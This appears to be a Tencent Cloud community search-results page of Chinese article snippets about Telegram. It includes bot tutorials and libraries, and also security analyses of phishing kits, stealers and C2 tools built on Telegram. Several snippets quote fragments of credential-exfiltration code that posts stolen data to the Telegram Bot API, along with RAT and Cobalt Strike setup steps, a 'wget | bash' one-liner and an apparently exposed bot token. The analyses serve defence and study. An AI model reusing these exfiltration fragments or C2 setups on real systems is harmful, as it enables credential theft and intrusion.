与Telegram API python (telithon telegram )的联合小组 - 腾讯云开发者社区

文章/答案/技术大牛

发布

黑客利用 Telegram API 传播新的 Golang 后门

Netskope 的网络安全研究人员发现了一种新型的、具备一定功能但可能仍处于开发阶段的基于 Golang 语言编写的后门程序，该程序利用 Telegram 进行指令与控制（C2）活动。...研究人员使用 Detect It Easy 工具检测发现，该恶意软件在执行过程中呈现出典型的后门特征。在 C2 通信方面，该后门程序借助一个开源的 Go 语言包与 Telegram 进行交互。...“/screenshot” 指令虽未完全开发完成，但仍会向 Telegram 频道发送 “Screenshot captured” 的消息。...所有指令的执行结果都会通过 “sendEncrypted” 函数回传至 Telegram 频道。这种恶意利用云应用程序的行为给网络安全防御工作带来了巨大挑战。...一方面，攻击者无需搭建复杂的基础设施，降低了攻击成本；另一方面，从防御者角度出发，很难区分正常的 API 用户请求和恶意的 C2 通信。”

3941 0

不得不说的Telegram : 币圈与链圈的微信

你可以带着这个问题来阅读这篇软件体验报告，今天的主角是一款 IM 软件：Telegram Telegram Messenger 是一个跨平台的实时通讯软件，它的客户端是自由及开放源代码软件，但是它的服务器是专有软件...用户可以相互交换加密与自析构的消息，以及照片、影片、文件，支持所有的文件类型。...官方网站有正式发布 Android、iOS、Mac OS X 与正在 Beta 的 Windows Phone 的版本。...在我们隐私被暴露在互联网各个角落的今天， Telegram 对信息安全的重视显得弥足珍贵。...Telegram 支持 1h、8h、2d 的定时静音，非常适合看电影、开会、读书、周末等场景。 ? Telegram绝对是一把打开新世界大门的钥匙。

2.3K1 0

您找到你想要的搜索结果了吗？

是的

没有找到

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动，系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能，实现凭据窃取、会话劫持与恶意分发的闭环。...本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架，并辅以可落地的代码示例，验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...关键词：Telegram；钓鱼攻击；Bot API；AiTM；数据外泄；WebView劫持；零信任1 引言即时通讯平台因其高渗透率、端到端加密与开放API生态，已成为现代数字协作不可或缺的组成部分。...与传统依赖自建C2服务器或僵尸网络的模式不同，此类攻击完全依托Telegram的合法服务链——包括Bot API、公开频道、私有群组及内嵌WebView——构建隐蔽且高效的攻击管道。...2 攻击机制深度解析2.1 攻击链路重构根据SC Media与Cyber Security News联合披露的案例，本次攻击可分为五个关键阶段：诱饵分发：攻击者在公开Telegram频道（如@FreeNFT_Giveaway

2231 0

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

2025年下半年，欧洲多国安全机构联合披露一类新型凭证钓鱼活动，其核心特征是以Telegram机器人作为攻击控制中枢，实现钓鱼模板分发、受害者数据实时回传与会话接管指令下发。...研究发现，攻击者通过将前端钓鱼页面与后端Telegram Bot解耦，显著提升了运营弹性与响应速度；同时利用Telegram频道的广播特性，实现“一对多”指令同步。...关键词：Telegram机器人；凭证钓鱼；Bot API；会话接管；多因素认证；行为检测1 引言随着云服务与数字身份的深度融合，凭证窃取已成为网络攻击的核心目标。...Bot后端通常为Python脚本，使用python-telegram-bot库：from telegram import Updatefrom telegram.ext import Application...6 结论Telegram机器人在欧洲凭证钓鱼中的应用，标志着攻击模式从“静态投递”向“动态交互”的演进。其通过Bot API实现数据实时回传与操作指令下发，显著缩短攻击窗口并提升成功率。

1631 0

telegram-1：向tg的机器人群推送消息

Telegram Bot的创建简单，API全面且免费，适合国际业务。业务需求：最近需要将自动客户端的自动打包结果的二维码和下载地址推送到tg机器人群，需要了解。...目录： (1).创建telegram机器人 (2).创建一个接受机器人消息的群组 (3).python向bot推送消息的demo 1.相关准备 2.测试demo (1).创建telegram机器人登录...浏览器访问下述url获取这个群组的chat_id： https://api.telegram.org/bot5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A/...getUpdates 在返回值中找到这个群组的chat_id，机器人会向这个chat_id发送消息： -750599670 (3).python向bot推送消息的demo 1.相关准备去官网查看下api...: https://core.telegram.org/bots/api 需要用到 python-telegram-bot 库。

11.8K3 0

命令控制之Telegram

的Bots功能结合Python来对API的调用来实现C2。...Cracking Telegram Encryption，而且Telegram支持发送所有文件类型，Telegram提供对外开放的api，用户可定制性的开发客户端。...之后成功创建Token： 12724xxxx059:AAEINExxxxxxxxxxxxxxxxxxx_hIl8A Bot API 示例安装依赖目前Telegram官网已经公开了如下语言的开发实例:...以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能，剩下只需要将功能拼接，添加命令解析，就可以实现一个简易的C2 Server POC bt2框架项目介绍 Bt2是一个使用python...编写开发的C2框架，它使用了telegram提供的基础设施和功能丰富的bot api，稍微改变了其通信平台的用途，使其可以充当c&c。

4K2 0

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

2025年11月，安全厂商Group-IB与KnowBe4联合披露了一款专门针对意大利实体的新型钓鱼工具包（Phishing Kit），该工具包以意大利主流IT服务提供商Aruba为伪装对象，通过伪造其...更关键的是，Telegram Bot作为数据回传通道，具有高隐蔽性与实时性：// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...(scripts.some(s => s.includes('api.telegram.org'))) {console.warn('Telegram exfiltration detected');return...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains...企业亦应实施最小权限原则，限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析，揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

1381 0

Afdian.Sdk | 开发笔记

: 一个爱发电开发者API的简易包装 PHP | ZeroDream-CN/afdian-php-sdk: 爱发电非官方简易 PHP SDK Python | gsycl2004/afdian-python-sdk...: 爱发电接口封装 Java | afdian-java-sdk: 爱发电api的 java sdk VPS 测速脚本 1. superbench.sh wget -qO- git.io/superbench.sh...| bash 2. superspeed.sh zq/superspeed: 包含全国各地测速节点的一键测速脚本 Superspeed.sh 使用全国各地三大运营商2的 speedtest 测速节点进行全面测速...TelegramBots/Telegram.Bot: .NET Client for Telegram Bot API 开发者 | 爱发电 Telegram.Bot.Examples/Telegram.Bot.Examples.WebHook...at master · TelegramBots/Telegram.Bot.Examples Telegram Bot API 本文作者： yiyun 本文链接： https://moeci.com/

1.5K3 0

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

关于TelegramRAT TelegramRAT是一款功能强大的基于Telegram的远程通信访问控制工具，该工具具备跨平台特性，可以通过Telegram来实现控制端与目标设备之间的远程通信...工具安装由于该工具基于纯Python开发，因此我们首先需要在本地设备上安装并配置好Python环境。...并搜索https://t.me/BotFather； 2、创建Bot并获取API_TOKEN； 3、现在搜索https://t.me/chatIDrobot并获取chat_id； 4、打开client.py...，定位到第16行和第17行，并在其中写入API_TOKEN和chat_id； 5、在Windows系统中运行python client.py或在Linux中运行python3 client.py； 6、...打开你刚刚创建的Bot，并直接在消息输入框中输入并发送命令即可；许可证协议本项目的开发与发布遵循Apache-2.0开源许可证协议。

8403 0

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

novuhq/novu[1] Stars: 22.9k License: MIT Novu 是一个开源的通知基础设施项目，它提供了统一的 API 来通过多个渠道发送通知，包括应用内、推送、电子邮件...主要功能有：为所有消息提供商 (应用内、电子邮件、短信、推送和聊天) 提供单一 API 管理多个渠道上的通知非常容易配备 CMS 进行高级布局和设计管理内置保护机制以防止变量丢失 (即将推出) 安装和集成简单方便...python-telegram-bot/python-telegram-bot[2] Stars: 22.9k License: GPL-3.0 这个项目是一个提供纯 Python 异步接口的 Telegram...Bot API 库。...它与 Python 3.8+兼容，并包含一些高级类，使机器人开发变得简单和直观。该库支持 Telegram Bot API 6.8 的所有类型和方法。

1.5K2 0

DeepPavlov: 强大的聊天机器人和对话系统开源AI库（附安装指南）

我们支持 Linux 与 Windows 平台，以及 Python 3.6 和 Python 3.7 不支持 Python 3.5！...-m deeppavlov [-d] 可以为 download，用于下载模型数据（与 -d 相同）， train，使用配置文件中指定的数据训练模型...， evaluate，在同一数据集上计算指标， interact，通过 CLI 进行交互， riseapi，运行 REST API 服务器（请参阅文档[1]）， telegram，作为 Telegram...，请参阅 Telegram 机器人文档页面以及“集成”部分中的其他内容，以获取更多信息。...这些文档深入探讨了这篇文章中提及的许多主题：文档[1] http://docs.deeppavlov.ai/en/master/integrations/rest_api.html 文档[2] http

4.4K1 0

Cobalt Strike beacon上线通知cna脚本

我在github找到了slack的通知脚本slack-notify-beacon.cna，虽然也找到了一个telegram通知的，但是写的太麻烦，还要调用Python，于是自己改写了一个telegram-bot...message containing it # ------------------------------------------- $tg_bot_webhookURL = 'https://api.telegram.org...$message, $tg_bot_webhookURL); exec(@curl_command); } 需要客户端/服务端支持curl、能够访问tg的api地址（国内访问不到）原理很简单，...beacon_initial 后通过调用os的curl请求webhook，bot的申请教程可以百度，同理可以很简单的改写其他webhook，如：钉钉、Server酱等 telegram的bot申请地址：...https://telegram.me/botfather 推荐阅读： https://www.right.com.cn/forum/forum.php?

4.1K6 0

1分钟链圈 | 区块链人才稀缺，深圳企业提高8%薪酬预算抢才!美投行：加密货币将暴跌90%，大众市场或被消灭

（每日区块链） 6.Telegram计划取消公开发售加密货币但其已募集了17亿美元资金据知情人士透露，Telegram已经将其新创建的加密货币出售给了少于200名私人投资者并筹集了17亿美元。...Telegram表示正在利用名为Telegram Open Network的项目筹集的资金来构建其技术，并进一步重新开发和维护主要的信使服务，Telegram的服务目前在全球拥有约2亿用户。...据BOK的2017年支付结算报告书，韩国央行有一个专门小组自1月份以来一直在研究发布CBDC的可能性以及加密货币将如何影响该国的金融。 BOK表示将在六月底之前公布有关这个问题的最新消息。...（巴比特） 10.澳大利亚联合国儿童基金会启动采矿捐赠平台澳大利亚联合国儿童基金会推出了一个平台，该网站将“允许用户通过在线时打开网页来为弱势儿童提供帮助和希望”。...（搜狐） 13.区块链人才稀缺，深圳企业提高8%薪酬预算抢才 2018春季深圳人才供求与流动报告显示，AI、区块链等新技术岗位人才稀缺，供不应求，其中区块链领域的需求在过去一年增长了近20倍，为了招到人才

6603 0

Github 项目推荐 | 用于构建端对端对话系统和训练聊天机器人的开源库 —— DeepPavlov

为 AI 应用的开发者提供：构建会话软件的框架；应用程序与相邻基础设施集成的工具。...查看部署面向目标的机器人和 Telegram UI 槽填充模型的视频 Demo。...用 Telegram 接口运行面向目标的机器人： python deep.py interactbot skills/go_bot/config.json -t TELEGRAM_TOKEN> 用控制台接口运行面向目标的机器人...： python deep.py interact skills/go_bot/config.json 用 Telegram 接口运行槽填充模型： python deep.py interactbot...models/ner/config.json -t TELEGRAM_TOKEN> 用控制台接口运行槽填充模型： python deep.py interact models/ner/config.json

2.5K9 0

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

而这一切的起点，可能只是员工点击了一封伪装成“DHL包裹通知”的链接。近日，一项由多家安全研究机构联合开展的新调查，首次系统性追踪了钓鱼攻击中被盗数据的完整生命周期。...取而代之的，是基于即时通讯工具的实时数据回传机制。其中，Telegram因其开放的Bot API、端到端加密（可选）、以及极低的运营门槛，成为当前最主流的“数据接收器”。...研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中，发现了如下代码片段：// 钓鱼表单提交后执行fetch('https://api.telegram.org/bot/sendMessage...和——它们指向攻击者预先创建的Telegram Bot。...六、防御之道：从“被动响应”到“主动免疫”面对如此复杂的钓鱼生态，个人与企业该如何应对？

1081 0

数据隐私、AI 交互和知识管理：DB-GPT 的综合解决方案 | 开源日报 0905

cover python-telegram-bot/python-telegram-bot[1] Stars: 22.9k License: GPL-3.0 这个项目是一个提供纯 Python 异步接口的...Telegram Bot API 库。...它与 Python 3.8+兼容，并包含一些高级类，使机器人开发变得简单和直观。该库支持 Telegram Bot API 6.8 的所有类型和方法。...支持 Python 版本提供了许多高级类来简化机器人开发兼容性强 raysan5/raylib[2] Stars: 14.6k License: Zlib raylib 是一个简单易用的库，可用于享受视频游戏编程...GPT大型模型与数据和环境进行交互，旨在提供私密性和安全性的数据处理解决方案。

1K2 0

Telegram小程序钓鱼攻击机制与防御策略研究

关键词：Telegram；Mini Apps；网络钓鱼；数字资产；钱包劫持；安全防护(1) 引言Telegram自2013年上线以来，凭借端到端加密（Secret Chat）、跨平台同步及开放API等特性...(2) Telegram Mini Apps架构与安全模型Telegram Mini Apps本质上是运行在Telegram客户端WebView容器中的单页Web应用（SPA）。...从安全角度看，Telegram Mini Apps的设计遵循以下原则：沙箱隔离：Mini App运行于受限的WebView中，无法直接调用系统API；数据最小化：仅在用户明确授权后，才通过initData...示例：Kaspersky for Android可通过Notification Listener API监控Telegram通知中的链接，并在用户点击前弹出风险提示。...(6) 结语本文系统研究了Telegram Mini Apps环境下的新型钓鱼攻击。研究表明，攻击者利用平台宽松的发布政策与用户对内嵌应用的信任，通过社会工程与技术伪造相结合的方式，高效窃取数字资产。

1301 0

信息窃密木马入局新玩家：ExelaStealer

该恶意软件使用 Python 编写，可以从 Windows 失陷主机窃取敏感信息（如密码、信用卡、Cookie 与 Session 等）。...此外，攻击者还提供了 Telegram 频道，分析时仍处于活动状态。Telegram 主页介绍了购买的付费版本，与开源版本的 GitHub 仓库地址。...Telegram 广告恶意软件构建任何人都可以使用免费提供的源代码创建 ExelaStealer 恶意文件：构建选项恶意软件只能在 Windows 机器上编译与打包，恶意软件主要代码在名为...Exela.py的文件中：源代码构建过程会使用批处理文件启动程序，再调用 Python 与 builder.py脚本文件：构建文件构建工具使用名为 obf.py的文件来进行必要的处理混淆 ExelaStealer...收集的数据每个文本文件都包含 Telegram 频道的 URL，如下所示： Telegram 信息文件使用与文件夹同名的 UUID 压缩成 ZIP 文件，然后通过 Discord webhook 发送到

3763 0

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

文中提供可部署的自动化检测脚本示例，包括相似域名生成与监控、邮件URL跳转链解析、Telegram Bot通信特征提取等关键技术实现。...：完全克隆Aruba登录页与支付页，包括CSS、JavaScript及动态表单；CAPTCHA绕过模块：集成reCAPTCHA v2 bypass代理，向真实Google API发起请求并回传token...email=user@domain.com）自动填入登录框，增强真实性；Telegram Bot数据外传：用户提交凭证后，数据通过HTTPS POST至中间脚本，再由Python脚本推送至攻击者控制的Telegram...3.3 数据外泄路径典型数据流如下：Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...(creds):url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"payload = {"chat_id": CHAT_ID,"text

1821 0

Telegram困境反思：绝对隐私，相对自由

Telegram 团队的核心成员有一些来自当初 VK 的员工，他们与保罗有着类似的信仰。这个团队也是最为颠沛流离的团队，成员从来没有公开的资料，工作场所也不固定。...2、功能强这一条与隐私保护相辅相成。Telegram 支持设定聊天记录定时销毁；支持一键删除账户，删除了账户后，所有相关的资料也都一并销毁。...3、体积小速度快除了使用端到端加密的技术来确保信息传输的隐私与安全之外，Telegram 本身的体积也很小，iOS 版本只有 30 M 左右（包含自定义贴纸表情、机器人等多重功能），相比之下...Telegram 在各个平台上几乎是从最底层的简单 API 实现，几乎不使用常见的库，而是自己实现所有的界面控件，且控件样式简单，效率很高。...从 VK 走到如今的 Telegram，每一次选择都彰显了他的个人追求，与传统商人不同，他并不看重自身利益，而是希望能坚持信仰（隐私和自由）。Telegram 成立至今，他一直拿自己的积蓄来维持运转。

3.4K0 0

点击加载更多

黑客利用 Telegram API 传播新的 Golang 后门

不得不说的Telegram : 币圈与链圈的微信

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

telegram-1：向tg的机器人群推送消息

命令控制之Telegram

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

Afdian.Sdk | 开发笔记

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

DeepPavlov: 强大的聊天机器人和对话系统开源AI库（附安装指南）

Cobalt Strike beacon上线通知cna脚本

1分钟链圈 | 区块链人才稀缺，深圳企业提高8%薪酬预算抢才!美投行：加密货币将暴跌90%，大众市场或被消灭

Github 项目推荐 | 用于构建端对端对话系统和训练聊天机器人的开源库 —— DeepPavlov

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

数据隐私、AI 交互和知识管理：DB-GPT 的综合解决方案 | 开源日报 0905

Telegram小程序钓鱼攻击机制与防御策略研究

信息窃密木马入局新玩家：ExelaStealer

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

Telegram困境反思：绝对隐私，相对自由

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐